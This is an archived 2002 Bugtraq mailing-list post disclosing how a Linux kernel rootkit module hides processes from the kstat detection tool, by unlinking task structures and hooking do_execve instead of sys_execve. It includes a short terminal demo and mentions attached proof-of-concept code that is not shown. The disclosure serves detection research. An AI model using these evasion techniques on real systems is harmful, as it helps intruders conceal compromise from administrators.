NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2002-09

From: Dark Angel (dark0_at_angelfire.com)
Date: Thu Sep 05 2002 - 21:06:10 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Is possible to hide processes to kstat removing theirs structs from the kernel's task_struct list.
Is also possible to bypass kstat's checks on syscalls: if you modify a sub-function instead of the call (for example do_execve instad of sys_execve) the effects is the same, but for kstat is all okay:

Shoikan:~/Phantasmagoria# ./kstat -P | grep kstat
686 403 0 0 kstat
Shoikan:~/Phantasmagoria# ./kstat -S
Probing System Calls FingerPrints... No System Call Modified!
Shoikan:~/Phantasmagoria# insmod Phantasmagoria.o
Shoikan:~/Phantasmagoria# ./Heider 403(the current shell pid) HIDE
Hiding successfull
Shoikan:~/Phantasmagoria# ./kstat -P | grep kstat
Shoikan:~/Phantasmagoria# ./kstat -S
Probing System Calls FingerPrints... No System Call Modified!
Shoikan:~/Phantasmagoria#

Attached there is an english translation + proof of concept code of the original paper published on www.s0ftpj.org

Regards

-= Dark-Angel =-

Is your boss reading your email? ....Probably
Keep your messages private by using Lycos Mail.
Sign up today at http://mail.lycos.com

application/x-gzip attachment: Phantasmagoria.tgz

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]